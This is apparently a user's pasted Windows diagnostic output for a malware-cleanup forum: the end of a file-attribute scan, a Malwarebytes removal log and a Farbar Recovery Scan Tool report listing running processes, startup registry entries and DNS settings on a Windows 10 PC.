    File "C:\WINDOWS\System32\drivers\WPDUPFLTR.SYS" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\ws2ifsl.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\drivers\WUDFPf.sys" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\AJRouter.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WINDOWS.STATEREPOSITORY.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WINDOWS.STATEREPOSITORY.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\AUDIOENDPOINTBUILDER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\AUDIOENDPOINTBUILDER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WALLETSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\APPXDEPLOYMENTSERVER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\APPXDEPLOYMENTSERVER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\EMBEDDEDMODESVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\inetsrv\APPHOSTSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ipnathlp.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\lsm.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\umpnpmgr.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\rpcss.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\appinfo.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\appidsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\AxInstSv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dcpsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\APPREADINESS.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\audiosrv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\RpcEpMap.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dssvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\bdesvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\BFE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\XBLAUTHMANAGER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\netman.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DEVICESETUPMANAGER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\cdpsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\umpo.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\qmgr.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ListSvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\lltdsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\bisrv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dhcpcore.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\browser.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\BthHFSrv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\BthHFSrv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\profsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\pnrpsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\bthserv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\provsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\das.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\LICENSEMANAGERSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\certprop.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DMWAPPUSHSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ClipSVC.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\COREMESSAGING.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\COREMESSAGING.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\cryptsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\TETHERINGSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\TETHERINGSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\moshost.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\moshost.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DEFRAGSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DEVQUERYBROKER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wscsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WsmSvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wersvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wecsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wcmsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wkssvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dot3svc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DIAGTRACK.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\DIAGTRACK.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WINDOWS.INTERNAL.MANAGEMENT.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WINDOWS.INTERNAL.MANAGEMENT.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\MPSSVC.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\fdPHost.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dnsrslvr.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\dps.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WERCPLSUPPORT.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\eapsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\efssvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ENTERPRISEAPPMGMTSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ENTERPRISEAPPMGMTSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\FntCache.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\es.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\sdrsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\srvsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\FDResPub.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\upnphost.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\fhsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\gpsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\hidserv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\IKEEXT.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\iphlpsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\keyiso.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\msdtckrm.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\lfsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\lmhsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\iscsiexe.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\nsisvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\nlasvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ngcsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\NcaSvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\NCDAUTOSETUP.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\NCBSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\netlogon.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\trkwks.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\NETPROFMSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\NETSETUPSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\NETSETUPSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\icsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\NGCCTNRSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\APHOSTSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\pcasvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\p2psvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\PIMINDEXMAINTENANCE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\PIMINDEXMAINTENANCE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\pla.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\pnrpauto.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\IPSECSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\qwave.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\rasauto.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\rasmans.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\mprdim.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\regsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\RDXSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\RDXSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\schedsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SCardSvr.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\XBLGAMESAVE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SCDEVICEENUM.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\seclogon.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\Sens.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SENSORSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\sensrsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SessEnv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\shsvcs.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\TILEOBJSERVER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\TILEOBJSERVER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\smphost.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SMSROUTERSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\StorSvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\sstpsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ssdpsrv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wiaservc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\svsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\swprv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\inetsrv\iisw3adm.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\sysmain.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SYSTEMEVENTSBROKERSERVER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\SYSTEMEVENTSBROKERSERVER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\TabSvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\termsrv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\tapisrv.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\THEMESERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\TIMEBROKERSERVER.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\umrdp.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\Unistore.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\USERDATASERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\USERDATASERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\usermgr.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\usocore.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\vaultsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\w32time.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\inetsrv\w3logsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wbiosrvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wwansvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WUDFSvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wlidsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wlansvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wcncsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wcncsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WebClnt.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WCSPLUGINSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wdi.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WEPHOSTSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wiarpc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wbem\WMIsvc.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WORKFOLDERSSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WORKFOLDERSSVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WPDBUSENUM.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WPNSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\WSSERVICE.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\wuaueng.dll" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\XBOXNETAPISVC.DLL" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\rundll32.exe" is sparse (flags = 32768)
    File "C:\Program Files\Windows Mail\WinMail.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\unregmp2.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\ie4uinit.exe" is sparse (flags = 32768)
    File "C:\WINDOWS\SysWOW64\rundll32.exe" is sparse (flags = 32768)
    File "C:\ProgramData\AVAST Software\Avast\log\AvastSvc.log" is compressed (flags = 1)
    File "C:\ProgramData\AVAST Software\Avast\log\AvastUI.log" is compressed (flags = 1)
    File "C:\ProgramData\AVAST Software\Avast\log\CommChannel.Protocol.log" is compressed (flags = 1)
    File "C:\Users\Kym\AppData\Local\Comms\UnistoreDB\store.vol" is sparse (flags = 32768)
    File "C:\WINDOWS\System32\config\systemprofile\AppData\Local\DataSharing\Storage\DSTokenDB2.dat" is sparse (flags = 32768)
    Scan finished
    =======================================


    Removal queue found; removal started
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-i.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-0-0-206848-i.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-0-r.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-i.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-1-0-206848-i.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-1-r.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-2-i.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\VBR-2-0-2048-i.mbam...
    Removing C:\ProgramData\Malwarebytes' Anti-Malware (portable)\MBR-2-r.mbam...
    Removal finished

    Scan result of Farbar Recovery Scan Tool (FRST) (x64) Version:27-02-2016
    Ran by Kym (administrator) on KYM-PC (01-03-2016 22:11:51)
    Running from C:\Users\Kym\Desktop
    Loaded Profiles: Kym (Available Profiles: Kym)
    Platform: Windows 10 Home (X64) Language: English (United States)
    Internet Explorer Version 11 (Default browser: Chrome)
    Boot Mode: Normal
    Tutorial for Farbar Recovery Scan Tool: http://www.geekstogo.com/forum/topic...ery-scan-tool/

    ==================== Processes (Whitelisted) =================

    (If an entry is included in the fixlist, the process will be closed. The file will not be moved.)

    (AMD) C:\WINDOWS\System32\atiesrxx.exe
    (Intel Corporation) C:\WINDOWS\System32\igfxCUIService.exe
    (AMD) C:\WINDOWS\System32\atieclxx.exe
    (Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastSvc.exe
    (Apple Inc.) C:\Program Files\Common Files\Apple\Mobile Device Support\AppleMobileDeviceService.exe
    (Adobe Systems, Incorporated) C:\Program Files (x86)\Common Files\Adobe\AdobeGCClient\AGSService.exe
    (Intel(R) Corporation) C:\Program Files\Intel\iCLS Client\HeciServer.exe
    (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\AutoUpdate\SkypeC2CAutoUpdateSvc.exe
    (Apple Inc.) C:\Program Files\Bonjour\mDNSResponder.exe
    (Microsoft Corporation) C:\Program Files (x86)\Skype\Toolbars\PNRSvc\SkypeC2CPNRSvc.exe
    (Microsoft Corporation) C:\WINDOWS\System32\mqsvc.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDFSSvc.exe
    (Razer Inc.) C:\Program Files (x86)\Razer Chroma SDK\bin\RzSDKService.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDUpdSvc.exe
    (Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\PDFProFiltSrvPP.exe
    () C:\Program Files (x86)\Razer\Razer Services\GSS\GameScannerService.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDWSCSvc.exe
    (Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
    (Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v4.0.30319\SMSvcHost.exe
    (Avast Software) C:\Program Files\AVAST Software\Avast\ng\vbox\AvastVBoxSVC.exe
    (AVAST Software) C:\Program Files\AVAST Software\Avast\ng\ngservice.exe
    (Microsoft Corporation) C:\WINDOWS\Microsoft.NET\Framework64\v3.0\WPF\PresentationFontCache.exe
    (Intel Corporation) C:\WINDOWS\System32\igfxEM.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Realtek Semiconductor) C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\LCore.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDMedia.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDCountdown.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDClock.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDPOP3.exe
    (Logitech Inc.) C:\Program Files\Logitech Gaming Software\Applets\LCDRSS.exe
    (Apple Inc.) C:\Program Files\iTunes\iTunesHelper.exe
    (Advanced Micro Devices, Inc.) C:\Program Files\AMD\CNext\CNext\cnext.exe
    (Apple Inc.) C:\Program Files\iPod\bin\iPodService.exe
    (Angus Johnson) D:\Internode\mum.exe
    (Spotify Ltd) C:\Users\Kym\AppData\Roaming\Spotify\SpotifyWebHelper.exe
    (Acresso Corporation) C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe
    (Intel Corporation) C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe
    (Avast Software s.r.o.) C:\Program Files\AVAST Software\Avast\AvastUI.exe
    (Razer Inc.) C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe
    (Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe
    (Nuance Communications, Inc.) C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfPro5Hook.exe
    (Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCtrlCntr.exe
    (Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe
    (Brother Industries, Ltd.) C:\Program Files (x86)\ControlCenter4\BrCcUxSys.exe
    (Brother Industries, Ltd.) C:\Program Files (x86)\Browny02\BrYNSvc.exe
    (Oracle Corporation) C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe
    (Safer-Networking Ltd.) C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe
    () C:\ProgramData\Razer\Synapse\RzStats\RzStats.Manager.exe
    (Razer, Inc.) C:\Program Files (x86)\Razer\InGameEngine\32bit\RazerIngameEngine.exe
    (Razer, Inc.) C:\Users\Kym\AppData\Local\Razer\InGameEngine\cache\RzStats.Manager\rzcefrenderprocess.exe
    (Razer, Inc.) C:\Users\Kym\AppData\Local\Razer\InGameEngine\cache\RzSynapse\rzcefrenderprocess.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe
    (Adobe Systems Incorporated) D:\Program Files\Adobe\Adobe Premiere Elements 2011\Elements 11 Organizer\PhotoshopElementsFileAgent.exe
    (Intel Corporation) C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorDataMgrSvc.exe
    (Microsoft Corporation) C:\WINDOWS\System32\InstallAgent.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
    (Google Inc.) C:\Program Files (x86)\Google\Chrome\Application\chrome.exe


    ==================== Registry (Whitelisted) ===========================

    (If an entry is included in the fixlist, the registry item will be restored to default or removed. The file will not be moved.)

    HKLM\...\Run: [RTHDVCPL] => C:\Program Files\Realtek\Audio\HDA\RAVCpl64.exe [13885696 2015-06-24] (Realtek Semiconductor)
    HKLM\...\Run: [IAStorIcon] => C:\Program Files\Intel\Intel(R) Rapid Storage Technology\IAStorIcon.exe [287592 2013-08-07] (Intel Corporation)
    HKLM\...\Run: [IgfxTray] => C:\Windows\system32\igfxtray.exe [396688 2015-07-18] ()
    HKLM\...\Run: [AdobeAAMUpdater-1.0] => C:\Program Files (x86)\Common Files\Adobe\OOBE\PDApp\UWA\UpdaterStartupUtility.exe [508240 2015-08-05] (Adobe Systems Incorporated)
    HKLM\...\Run: [Launch LCore] => C:\Program Files\Logitech Gaming Software\LCore.exe [14601160 2015-07-02] (Logitech Inc.)
    HKLM\...\Run: [iTunesHelper] => C:\Program Files\iTunes\iTunesHelper.exe [170256 2015-09-15] (Apple Inc.)
    HKLM\...\Run: [StartCN] => C:\Program Files\AMD\CNext\CNext\cnext.exe [4867784 2015-12-04] (Advanced Micro Devices, Inc.)
    HKLM-x32\...\Run: [USB3MON] => C:\Program Files (x86)\Intel\Intel(R) USB 3.0 eXtensible Host Controller Driver\Application\iusb3mon.exe [292848 2013-04-26] (Intel Corporation)
    HKLM-x32\...\Run: [Logitech G35] => D:\G35.exe
    HKLM-x32\...\Run: [AvastUI.exe] => C:\Program Files\AVAST Software\Avast\AvastUI.exe [5515496 2015-07-02] (Avast Software s.r.o.)
    HKLM-x32\...\Run: [] => [X]
    HKLM-x32\...\Run: [Razer Synapse] => C:\Program Files (x86)\Razer\Synapse\RzSynapse.exe [591512 2015-11-19] (Razer Inc.)
    HKLM-x32\...\Run: [QuickTime Task] => D:\QuickTime\QTTask.exe [421888 2014-10-02] (Apple Inc.)
    HKLM-x32\...\Run: [IndexSearch] => C:\Program Files (x86)\Nuance\PaperPort\IndexSearch.exe [46952 2011-08-02] (Nuance Communications, Inc.)
    HKLM-x32\...\Run: [PaperPort PTD] => C:\Program Files (x86)\Nuance\PaperPort\pptd40nt.exe [30568 2011-08-02] (Nuance Communications, Inc.)
    HKLM-x32\...\Run: [PDFHook] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\pdfpro5hook.exe [636192 2010-03-05] (Nuance Communications, Inc.)
    HKLM-x32\...\Run: [PDF5 Registry Controller] => C:\Program Files (x86)\Nuance\PDF Viewer Plus\RegistryController.exe [62752 2010-03-05] (Nuance Communications, Inc.)
    HKLM-x32\...\Run: [ControlCenter4] => C:\Program Files (x86)\ControlCenter4\BrCcBoot.exe [139776 2014-06-16] (Brother Industries, Ltd.)
    HKLM-x32\...\Run: [BrStsMon00] => C:\Program Files (x86)\Browny02\Brother\BrStMonW.exe [3076096 2012-06-06] (Brother Industries, Ltd.)
    HKLM-x32\...\Run: [LogMeIn Hamachi Ui] => "D:\LogMeIn\hamachi-2-ui.exe" --auto-start
    HKLM-x32\...\Run: [SunJavaUpdateSched] => C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe [595504 2016-01-29] (Oracle Corporation)
    HKLM-x32\...\Run: [SDTray] => C:\Program Files (x86)\Spybot - Search & Destroy 2\SDTray.exe [4127488 2015-06-16] (Safer-Networking Ltd.)
    Winlogon\Notify\SDWinLogon-x32: SDWinLogon.dll [X]
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [Steam] => D:\Steam\steam.exe [3014224 2016-02-05] (Valve Corporation)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [InternodeUsage] => D:\Internode\mum.exe [2242560 2014-12-04] (Angus Johnson)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [Spotify Web Helper] => C:\Users\Kym\AppData\Roaming\Spotify\SpotifyWebHelper.exe [2355312 2016-02-19] (Spotify Ltd)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [ISUSPM] => C:\ProgramData\FLEXnet\Connect\11\ISUSPM.exe [222496 2009-05-05] (Acresso Corporation)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [f.lux] => C:\Users\Kym\AppData\Local\FluxSoftware\Flux\flux.exe [1017224 2013-10-24] (Flux Software LLC)
    HKU\S-1-5-21-788086572-3644745805-1037152649-1000\...\Run: [SpybotPostWindows10UpgradeReInstall] => C:\Program Files\Common Files\AV\Spybot - Search and Destroy\Test.exe [1011200 2015-07-28] (Safer-Networking Ltd.)
    ShellIconOverlayIdentifiers: [ GoogleDriveBlacklisted] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D42} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
    ShellIconOverlayIdentifiers: [ GoogleDriveSynced] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D40} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
    ShellIconOverlayIdentifiers: [ GoogleDriveSyncing] -> {81539FE6-33C7-4CE7-90C7-1C7B8F2F2D41} => C:\Program Files (x86)\Google\Drive\googledrivesync64.dll [2016-01-15] (Google)
    ShellIconOverlayIdentifiers: [ SkyDrivePro1 (ErrorConflict)] -> {8BA85C75-763B-4103-94EB-9470F12FE0F7} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [ SkyDrivePro2 (SyncInProgress)] -> {CD55129A-B1A1-438E-A425-CEBC7DC684EE} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [ SkyDrivePro3 (InSync)] -> {E768CD3B-BDDC-436D-9C13-E1B39CA257B1} => D:\Microsoft Office 2013\Office15\GROOVEEX.DLL [2016-01-12] (Microsoft Corporation)
    ShellIconOverlayIdentifiers: [00avast] -> {472083B0-C522-11CF-8763-00608CC02F24} => C:\Program Files\AVAST Software\Avast\ashShA64.dll [2015-07-02] (Avast Software s.r.o.)
    Startup: C:\Users\Kym\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Open Broadcaster Software (32bit) (2).lnk [2015-08-20]
    ShortcutTarget: Open Broadcaster Software (32bit) (2).lnk -> C:\Program Files (x86)\OBS\OBS.exe ()
    BootExecute: autocheck autochk * sdnclean64.exe

    ==================== Internet (Whitelisted) ====================

    (If an item is included in the fixlist, if it is a registry item it will be removed or restored to default.)

    Hosts: There are more than one entry in Hosts. See Hosts section of Addition.txt
    Tcpip\Parameters: [DhcpNameServer] 192.168.1.1
    Tcpip\Parameters: [NameServer] 8.8.8.8,8.8.8.4
    Tcpip\..\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa}: [NameServer] 8.8.8.8,8.8.4.4
    Tcpip\..\Interfaces\{127aa56b-0275-418a-8714-77c67b9692aa}: [DhcpNameServer] 192.168.1.1

    Internet Explorer:
    ==================
    HKLM\Software\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Start Page =
    HKLM\Software\Microsoft\Internet Explorer\Main,Search Page =
    HKLM\Software\Wow6432Node\Microsoft\Internet Explorer\Main,Search Page =
